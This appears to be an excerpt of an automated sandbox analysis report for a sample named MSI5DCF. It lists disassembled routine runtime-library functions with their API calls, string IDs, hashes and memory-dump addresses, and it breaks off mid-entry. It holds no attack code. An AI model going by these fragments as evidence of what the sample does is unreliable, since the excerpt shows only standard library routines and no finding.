                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
                                                                        • String ID:
                                                                        • API String ID: 677527491-0
                                                                        • Opcode ID: dfae05c5f2ed11fd164ec6b7551f60a7b213622854b08c5d9f549d003f53054b
                                                                        • Instruction ID: 695458b1af982db88ecc732bbf32562bf52fa3b66b219f45c424a4701a650765
                                                                        • Opcode Fuzzy Hash: dfae05c5f2ed11fd164ec6b7551f60a7b213622854b08c5d9f549d003f53054b
                                                                        • Instruction Fuzzy Hash: 2601BC75E00A908BCB05EB71E9459BD7BA1BF85700B684009E92157381CF74AA02CBC1
                                                                        APIs
                                                                        • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00B18643,?,00000001,?,?,?,00B17788,?,?,00000000), ref: 00B18C8D
                                                                        • GetLastError.KERNEL32(?,00B18643,?,00000001,?,?,?,00B17788,?,?,00000000,?,?,?,00B17D0F,?), ref: 00B18C99
                                                                          • Part of subcall function 00B18C5F: CloseHandle.KERNEL32(FFFFFFFE,00B18CA9,?,00B18643,?,00000001,?,?,?,00B17788,?,?,00000000,?,?), ref: 00B18C6F
                                                                        • ___initconout.LIBCMT ref: 00B18CA9
                                                                          • Part of subcall function 00B18C21: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B18C50,00B18630,?,?,00B17788,?,?,00000000,?), ref: 00B18C34
                                                                        • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00B18643,?,00000001,?,?,?,00B17788,?,?,00000000,?), ref: 00B18CBE
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                        • String ID:
                                                                        • API String ID: 2744216297-0
                                                                        • Opcode ID: 61b75ea86dfcb7ae3900dbdff1c11baccdc28c07df6e09d38938e114f6d23f19
                                                                        • Instruction ID: 53ac3dc0ac3ac000f85c3f813befbbd49571753c6c0cca020d3debbbf1f660ce
                                                                        • Opcode Fuzzy Hash: 61b75ea86dfcb7ae3900dbdff1c11baccdc28c07df6e09d38938e114f6d23f19
                                                                        • Instruction Fuzzy Hash: 9AF0F236101159BBCF222F959C08DCE3FA6FF097B0F918450FA1996220DE32D960ABA0
                                                                        APIs
                                                                        • SleepConditionVariableCS.KERNELBASE(?,00AF789A,00000064), ref: 00AF7920
                                                                        • LeaveCriticalSection.KERNEL32(00B34AF8,?,?,00AF789A,00000064,?,?,00AD25B6,00B3571C,B7207CF4,?,00000000,00B193ED,000000FF,?,00AD1A26), ref: 00AF792A
                                                                        • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00AF789A,00000064,?,?,00AD25B6,00B3571C,B7207CF4,?,00000000,00B193ED,000000FF,?,00AD1A26), ref: 00AF793B
                                                                        • EnterCriticalSection.KERNEL32(00B34AF8,?,00AF789A,00000064,?,?,00AD25B6,00B3571C,B7207CF4,?,00000000,00B193ED,000000FF,?,00AD1A26), ref: 00AF7942
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                        • String ID:
                                                                        • API String ID: 3269011525-0
                                                                        • Opcode ID: eb01392445f38120a0eedbd218f6f7561d7b6416f6e92113c6cc6f7307b330cb
                                                                        • Instruction ID: f8b0e10845da20a175f8c3c541d8d1c3fa4323b0bc7381af33d82ff764fd2240
                                                                        • Opcode Fuzzy Hash: eb01392445f38120a0eedbd218f6f7561d7b6416f6e92113c6cc6f7307b330cb
                                                                        • Instruction Fuzzy Hash: 68E01232985135B7C7116B90EC09AED7F64EB09751F518055F91567170CFB16C109BD8
                                                                        APIs
                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00B0712D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorHandling__start
                                                                        • String ID: pow
                                                                        • API String ID: 3213639722-2276729525
                                                                        • Opcode ID: f10d17068928157a6460bfbc0e8d1c54d0bc9dddc55832f19401576581f58884
                                                                        • Instruction ID: 13ec90fa9f4e2ca2009d4f3ec98269cb8e7b6668187b6ff3e449bc1c9bdc0ad2
                                                                        • Opcode Fuzzy Hash: f10d17068928157a6460bfbc0e8d1c54d0bc9dddc55832f19401576581f58884
                                                                        • Instruction Fuzzy Hash: BD514971F4C207A6CB35B718C94137AAFE0EB40700F248DF9F095926E9EE34DC969A42
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: __aulldiv
                                                                        • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                        • API String ID: 3732870572-1956417402
                                                                        • Opcode ID: f1e31ecc10935b515b44a2fb70cf7da30d642d06abc0b71bc2a3c952b3f107ac
                                                                        • Instruction ID: 371d1a247a037f3e94adfdc220bfe5eb78a9e3db3c8f3e5b3fce2b8157197d98
                                                                        • Opcode Fuzzy Hash: f1e31ecc10935b515b44a2fb70cf7da30d642d06abc0b71bc2a3c952b3f107ac
                                                                        • Instruction Fuzzy Hash: E851F370B0465C5BDF298FED88917BEBBFAAF59710F14406AFAD1D7241C27489428BA0
                                                                        APIs
                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00ADFA3E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Concurrency::cancel_current_task
                                                                        • String ID: false$true
                                                                        • API String ID: 118556049-2658103896
                                                                        • Opcode ID: 46d0773d636d2f4af2793f752f5253f89763ff24115940e4685c7127cbf9b664
                                                                        • Instruction ID: b438ba856f28baab55bdb3ad3045101de5699e601d0e93d85d33df91855e150a
                                                                        • Opcode Fuzzy Hash: 46d0773d636d2f4af2793f752f5253f89763ff24115940e4685c7127cbf9b664
                                                                        • Instruction Fuzzy Hash: 5A5194B1D003489FDB10DFA4C941BEEBBF8FF05314F14826AE946AB281E775AA45CB51
                                                                        APIs
                                                                        • __EH_prolog3_GS.LIBCMT ref: 00AF22B1
                                                                        • _swprintf.LIBCMT ref: 00AF2329
                                                                          • Part of subcall function 00AE780A: __EH_prolog3.LIBCMT ref: 00AE7811
                                                                          • Part of subcall function 00AE780A: std::_Lockit::_Lockit.LIBCPMT ref: 00AE781B
                                                                          • Part of subcall function 00AE780A: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE788C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$H_prolog3H_prolog3_Lockit::_Lockit::~__swprintf
                                                                        • String ID: %.0Lf
                                                                        • API String ID: 2348759532-1402515088
                                                                        • Opcode ID: 13f79bebbc3b6ad707fa2adca2a5e1ba4083c0fd2ec618016c729f6529bfa793
                                                                        • Instruction ID: 36d123e0f5a9d5e3288f7c33120e3f863a43650cfa60817848c1dd4e30009e6c
                                                                        • Opcode Fuzzy Hash: 13f79bebbc3b6ad707fa2adca2a5e1ba4083c0fd2ec618016c729f6529bfa793
                                                                        • Instruction Fuzzy Hash: 17515A71D00249ABCF05DFE4D945AEDBBB9FF08300F20855AF516AB295EB349945CF90
                                                                        APIs
                                                                        • __EH_prolog3_GS.LIBCMT ref: 00AF2595
                                                                        • _swprintf.LIBCMT ref: 00AF260D
                                                                          • Part of subcall function 00ADB500: std::_Lockit::_Lockit.LIBCPMT ref: 00ADB52D
                                                                          • Part of subcall function 00ADB500: std::_Lockit::_Lockit.LIBCPMT ref: 00ADB550
                                                                          • Part of subcall function 00ADB500: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADB578
                                                                          • Part of subcall function 00ADB500: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADB617
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                        • String ID: %.0Lf
                                                                        • API String ID: 1487807907-1402515088
                                                                        • Opcode ID: 1a0cfb47dbe9daadc740e1d4ec3c9aaf3857d456d2d7f659ec731083bdb9219f
                                                                        • Instruction ID: 7818466c37946b0f040248146cc34ebed701c74b50e66d96556c5d4b9e20d499
                                                                        • Opcode Fuzzy Hash: 1a0cfb47dbe9daadc740e1d4ec3c9aaf3857d456d2d7f659ec731083bdb9219f
                                                                        • Instruction Fuzzy Hash: 53515A71D00209ABCF05DFE4D955AEDBBB9FF08300F20841AF942AB295EB349945CF90
                                                                        APIs
                                                                        • __EH_prolog3_GS.LIBCMT ref: 00AF660E
                                                                        • _swprintf.LIBCMT ref: 00AF6686
                                                                          • Part of subcall function 00ADC590: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC5BD
                                                                          • Part of subcall function 00ADC590: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC5E0
                                                                          • Part of subcall function 00ADC590: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC608
                                                                          • Part of subcall function 00ADC590: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC6A7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3__swprintf
                                                                        • String ID: %.0Lf
                                                                        • API String ID: 1487807907-1402515088
                                                                        • Opcode ID: 161d1cdd6ff96f43c68ece1eb2eefd072ea8c5ab5bdf1132248000f8f7528875
                                                                        • Instruction ID: d524736da21260c054ebfba17532b59672baff884ddbab330bcf23adead447cb
                                                                        • Opcode Fuzzy Hash: 161d1cdd6ff96f43c68ece1eb2eefd072ea8c5ab5bdf1132248000f8f7528875
                                                                        • Instruction Fuzzy Hash: AA514A71D0020DABCF09DFE4D985AEDBBB5FF08300F20851AF516AB2A5EB359955CB50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: \\?\$\\?\UNC\
                                                                        • API String ID: 0-3019864461
                                                                        • Opcode ID: b251d1f16f524c0242676a55e585c15166d4ba5853a1bce348acc022ebc21f78
                                                                        • Instruction ID: 9fc5140c2816a88f72953ea7f9c63d7eeecd78ea43da0410158ed7a63b0944e3
                                                                        • Opcode Fuzzy Hash: b251d1f16f524c0242676a55e585c15166d4ba5853a1bce348acc022ebc21f78
                                                                        • Instruction Fuzzy Hash: 1A519E70A102049BDB24CF65D995BEEBBF5FF99314F10461EE802A7390DB75EA84CB90
                                                                        APIs
                                                                        • EncodePointer.KERNEL32(00000000,?), ref: 00AFB5F6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: EncodePointer
                                                                        • String ID: MOC$RCC
                                                                        • API String ID: 2118026453-2084237596
                                                                        • Opcode ID: 7d5e3c75f32bfa7d62e7d910164b4b42239af8c3e1ac036fbcb27048a60ff541
                                                                        • Instruction ID: 01aafc5e7ab231cc32c7bf7e945dc1dccdab9aa309314b0afddec7061570b599
                                                                        • Opcode Fuzzy Hash: 7d5e3c75f32bfa7d62e7d910164b4b42239af8c3e1ac036fbcb27048a60ff541
                                                                        • Instruction Fuzzy Hash: C541467190020DAFCF15DF98CD81AFEBBB5BF48304F198199FA04A6261D7359960DB64
                                                                        APIs
                                                                        • __EH_prolog3_GS.LIBCMT ref: 00AF2183
                                                                          • Part of subcall function 00AE780A: __EH_prolog3.LIBCMT ref: 00AE7811
                                                                          • Part of subcall function 00AE780A: std::_Lockit::_Lockit.LIBCPMT ref: 00AE781B
                                                                          • Part of subcall function 00AE780A: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE788C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$H_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                        • String ID: %.0Lf$0123456789-
                                                                        • API String ID: 2728201062-3094241602
                                                                        • Opcode ID: 590d026ca1d5c6a4bf816bada1b574f4a13eb5c4cd39ecb83a4c9ba6ffa73998
                                                                        • Instruction ID: 3ae8f0fb633850bec448c43b89ec5f5a061fcb71d76b30989efdae190735dd2a
                                                                        • Opcode Fuzzy Hash: 590d026ca1d5c6a4bf816bada1b574f4a13eb5c4cd39ecb83a4c9ba6ffa73998
                                                                        • Instruction Fuzzy Hash: 8F413831900219DFCF15EFD8C981AEDBBB5FF08310F54016AF912AB261DB349956CB95
                                                                        APIs
                                                                        • __EH_prolog3_GS.LIBCMT ref: 00AF64E2
                                                                          • Part of subcall function 00ADC590: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC5BD
                                                                          • Part of subcall function 00ADC590: std::_Lockit::_Lockit.LIBCPMT ref: 00ADC5E0
                                                                          • Part of subcall function 00ADC590: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC608
                                                                          • Part of subcall function 00ADC590: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADC6A7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3_
                                                                        • String ID: 0123456789-$0123456789-
                                                                        • API String ID: 2088892359-2494171821
                                                                        • Opcode ID: 58847d7b6a021d3e066365209abde870cb49260bb6fe17d2950cfe17814aa4a6
                                                                        • Instruction ID: 5adcc8d1c1aa9f848a673fe1cd248bdaf778cceaee8b78ea1851d3e52c0aa407
                                                                        • Opcode Fuzzy Hash: 58847d7b6a021d3e066365209abde870cb49260bb6fe17d2950cfe17814aa4a6
                                                                        • Instruction Fuzzy Hash: DE413A3190020DAFCF05DFE4D9919EE7BB5AF08310B10405AF922A7265DB35AA55CB55
                                                                        APIs
                                                                        • __EH_prolog3_GS.LIBCMT ref: 00AF2467
                                                                          • Part of subcall function 00ADB500: std::_Lockit::_Lockit.LIBCPMT ref: 00ADB52D
                                                                          • Part of subcall function 00ADB500: std::_Lockit::_Lockit.LIBCPMT ref: 00ADB550
                                                                          • Part of subcall function 00ADB500: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADB578
                                                                          • Part of subcall function 00ADB500: std::_Lockit::~_Lockit.LIBCPMT ref: 00ADB617
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3_
                                                                        • String ID: 0123456789-$0123456789-
                                                                        • API String ID: 2088892359-2494171821
                                                                        • Opcode ID: 9c45a5ae88bb0c5d5d4f333b7ee4e73c5954aef338df6984e5891578d6db9413
                                                                        • Instruction ID: a8c4faaa6e1867d8c6aad9b593458ebb1566784c927cf565ec8cef0821be3f29
                                                                        • Opcode Fuzzy Hash: 9c45a5ae88bb0c5d5d4f333b7ee4e73c5954aef338df6984e5891578d6db9413
                                                                        • Instruction Fuzzy Hash: 9C41473190021CDFCF05DFE8D9919EDBBB5BF08310F50016AF916AB251DB349A55CB65
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: H_prolog3___cftoe
                                                                        • String ID: !%x
                                                                        • API String ID: 855520168-1893981228
                                                                        • Opcode ID: 0ff4069eeba2e88a1a54991f7707081393aa4c470c8e39711ce66f310cb47e48
                                                                        • Instruction ID: c5e57bb084a298c66cb812ea78e2d3b1d20f0e33a036e5d8ce52988c5d4bd277
                                                                        • Opcode Fuzzy Hash: 0ff4069eeba2e88a1a54991f7707081393aa4c470c8e39711ce66f310cb47e48
                                                                        • Instruction Fuzzy Hash: AB410370A1124DEFDF04DFE8D841AEEBBB1BF08340F044429FA55AB252D734AA05CBA1
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: H_prolog3___cftoe
                                                                        • String ID: !%x
                                                                        • API String ID: 855520168-1893981228
                                                                        • Opcode ID: 0aa80fe6de241a420762afc71d764ccff2204f4930fbaa6593e4247def071062
                                                                        • Instruction ID: 1179a1a4e79c2973e65fef20574cdd5f776398274f597068f772af35a4c8d57f
                                                                        • Opcode Fuzzy Hash: 0aa80fe6de241a420762afc71d764ccff2204f4930fbaa6593e4247def071062
                                                                        • Instruction Fuzzy Hash: 3F312871A1020DEBDF14DFE4D981AEEBBB2BF48304F204429F905AB251E734AE15CB61
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: _swprintf
                                                                        • String ID: %$+
                                                                        • API String ID: 589789837-2626897407
                                                                        • Opcode ID: b39d73c114712bc7a0c520051bef6cbf79826105413febba4a58929db9fec4ca
                                                                        • Instruction ID: 41e7b00b988be35d92b75587c50e8ec6a202faf64caa1cbdf6a626ee558133f0
                                                                        • Opcode Fuzzy Hash: b39d73c114712bc7a0c520051bef6cbf79826105413febba4a58929db9fec4ca
                                                                        • Instruction Fuzzy Hash: 8E21B1711183449FD711CF18C859B9BBBE9AF89304F04895EFA9987392D638D918C7E2
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: _swprintf
                                                                        • String ID: %$+
                                                                        • API String ID: 589789837-2626897407
                                                                        • Opcode ID: 3e9fce11ca1897365caaab417e66c515cce5b85dbb9eae69775f6d4789b076d0
                                                                        • Instruction ID: d2865a439bdbbf41fb0732432a81f1323ecc7454458e9eb9a4732db40f65985c
                                                                        • Opcode Fuzzy Hash: 3e9fce11ca1897365caaab417e66c515cce5b85dbb9eae69775f6d4789b076d0
                                                                        • Instruction Fuzzy Hash: A521C1752083459FE711CF18C845B9BBBE9AB89300F14885EFA9587392C734D918CBA7
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
